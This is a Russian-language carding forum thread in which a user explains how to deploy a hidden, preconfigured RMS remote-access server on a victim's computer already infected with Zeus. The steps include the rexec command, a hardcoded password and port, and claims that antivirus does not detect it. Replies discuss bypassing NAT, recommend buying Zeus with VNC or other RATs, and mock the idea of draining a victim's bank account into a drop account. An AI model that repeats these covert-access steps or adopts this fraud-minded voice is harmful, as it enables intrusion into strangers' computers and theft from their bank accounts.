Удалённое управление компьютером (через Zeus, SpyEYE и д.р.)

viens

Carder
Messages
86
Reputation
18
Reaction score
39
Points
18
Всем привет. Установил я себе zeus, залил трафика..И тут мне захотелось по управлять компьютером одного "денежного" бота, понаблюдать за его рабочим столом, получить доступ к файлам..Первое что пришло на ум - это установить боту программу Radmin (кто в танке и не знает что это за прога - google в помощь). Я хотел сделать exe-ник, загрузить боту через команду rexeci* и что бы он автоматически (в скрытом режиме) установился на компьютере бота, с моими настройками. После долгих экспериментов у меня этого не получилось. Тут увидел похожую программу - RMS**. Оказывается она уже давно на вооружении хаЦкеров..нашёл статьи на эту тему, сделал свой батник, собрал все нужные файлы в один exe-ник..и о чудо - Работает!!!

И так в архиве лежит сам exe-ник. Его отправляем жертве через команду rexeci (если у вас другой троян, не zeus, то ищите команды по загрузке и исполнению файлов к вашему трою, если такие есть). Сразу скажу, что жертва должна быть вне NAT (если нужная вам жертва в NAT, то делаем BackConnect, как его делать - читайте в мануалах про zeus). Устанавливаем к себе RMS viewer (его я положил в архив, так же можно скачать с официального сайта). Зпускаем RMS viewer, жмём добавить новое соединение. Указываем ip жертвы, пароль: viens777 и порт 5640 (во вкладке сеть и режим работы). Все остальные действия на ваше усмотрение))
Все файлы чистые, ни с чем не склеены. Антивирусы RMS не палят. Установка и работа RMS полностью в скрытом режиме.




* rexec [args] Загрузить и запустить прило...E] [SIZE="3"]мне в репутацию.[/SIZE][/CENTER]
 
Last edited:

viens

Carder
Messages
86
Reputation
18
Reaction score
39
Points
18
Пардон. Если можно - то тему в статьи перенесите.
 

Berger

VIP member
Messages
330
Reputation
82
Reaction score
121
Points
43
Сразу скажу, что жертва должна быть вне NAT (если нужная вам жертва в NAT, то делаем BackConnect, как его делать - читайте в мануалах про zeus)

эмм.... ну опиши работу если бот за натом, и как ты собираешся получить доступ к удаленному рабочему через бэконект,

ну окей, создал ты подключение указал ip адрес (в случае с бэкконектом я так понимаю адрес дедика с прямым ip) и что дальше? логиниться ты будешь на ip адрес дедика а не на ip адрес бота, и получишь еще один рабочий стол дедика?

как то данный момент (причем момент самый острый в данном вопросе, ты проскочил совсем быстро)
 

viens

Carder
Messages
86
Reputation
18
Reaction score
39
Points
18
эмм.... ну опиши работу если бот за натом, и как ты собираешся получить доступ к удаленному рабочему через бэконект
Если бот за NAT-ом, то способ я описал выше. Если бот в NAT, то через бэконект не получится, ты прав. Когда создавал топик, бэконект был в теории..тесты я проводил только на ботах, кот. были вне NAT.
Постараюсь исправить этот недочёт через новую версию:
Компания «TektonIT» сообщает о начале бета-тестирования Remote Manipulator System 4.4. В этой версии программы доступен новый вид соединения - Internet-ID.
Долгожданная возможность реализована — теперь любой сетевой экран или NAT — не помеха!

Если всё получится, то сразу тут отпишу.

__
 

zhassaksu

RIPPER
Messages
300
Reputation
19
Reaction score
31
Points
28
ну что там есть что ?
Компания «TektonIT» сообщает о начале бета-тестирования Remote Manipulator System 4.4. В этой версии программы доступен новый вид соединения - Internet-ID.
Долгожданная возможность реализована — теперь любой сетевой экран или NAT — не помеха!
Если всё получится, то сразу тут отпишу.
а как мне самомоу стать в НЕ НАТ
 

Berger

VIP member
Messages
330
Reputation
82
Reaction score
121
Points
43
а самому скачать и потестить?
если бы не ждал пока кто то другой напишет а сам попробовал то о многом бы понял)
Во первых: нет поддержки 2х сессий что означает только одно)) все что ты будешь делать на дедике, будет видеть холдер))

и так приступим)) перед холдером открывается браузер)) вводиться линк банка, далее он медленно аху**ет от того как вводиться его логин и пароль)) у бота начинается истерия, его везут на скорой)) ты сливаешь его бабло))) пока он в отрубе валяется по больничкам денюжка с его счета поступает на счет дропа.. урааа... бухаем)))


Тыда матыгай Тыда Матыгай Пешсай)))
 

zhassaksu

RIPPER
Messages
300
Reputation
19
Reaction score
31
Points
28
viens, Сегодня обещал статью напишет про zeus vip 1.3.5.5 очень итересно будет
 

maximthird

VIP member
Messages
659
Reputation
265
Reaction score
406
Points
63
Тыда матыгай Тыда Матыгай Пешсай)))
я щас окуел... :)
 

Berger

VIP member
Messages
330
Reputation
82
Reaction score
121
Points
43
бодрячком пацанчики))) бодрячкоом)))

а хренли хотел я не сплю 2е сутки)))
 
  • Like
Reactions: Zonder

    Zonder

    Points: 1
    Тыда Матыгай

viens

Carder
Messages
86
Reputation
18
Reaction score
39
Points
18
zhassaksu Да, я обошёл nat через новую версию (Berger свидетель). Только там немного гемороя появилось..во первых, под каждого бота нужно делать новый exe-ник (ну это не долго), т.к. один ID только на одну машинку (если в сети будут два id, то тупо блокируеться соединение) + если бот за приделами России или снг и ему ставить RMS server..то при подключении требует лицензию, хотя когда собирал exe-ник, там лицензия free, на 30 дней идёт..тут не понятна закономерность но требует лицензию (или нужна крякнутая версия).

Сейчас сделаю видео мануал по зевсу 1.3 а потом, может быть и до сюда доберусь..
 

Caligo

Member
Messages
13
Reputation
2
Reaction score
2
Points
3
да ну ересь ваши рмсы все вместе взятые... RATов куча бери нехочу.. ппц
 

Reizers

RIPPER
Messages
106
Reputation
5
Reaction score
10
Points
18
viens, есть возможность у этой проги впарить серверную часть жертве в скрытом режиме без помощи zeus?
 

FRAUD

RIPPER
Messages
618
Reputation
39
Reaction score
62
Points
28
бодрячком пацанчики))) бодрячкоом)))

а хренли хотел я не сплю 2е сутки)))

я четвертые. бе бе бе :D

---------- Сообщение добавлено в 07:27 PM ---------- Предыдущее сообщение размещено в 07:27 PM ----------

Купите зевса с VNC :D
 

Berger

VIP member
Messages
330
Reputation
82
Reaction score
121
Points
43
я четвертые. бе бе бе

хз хз.. стоит ли этим хвалиться) не подсядь на бессониуц :D

раты *уяты.. все это шляпа) покупайте спай зевса с внц :D
 

Caligo

Member
Messages
13
Reputation
2
Reaction score
2
Points
3
Прошу прощения Viens, не прочитал что "Не палица" если так то действительно полезный софт) сенкс.
 
Top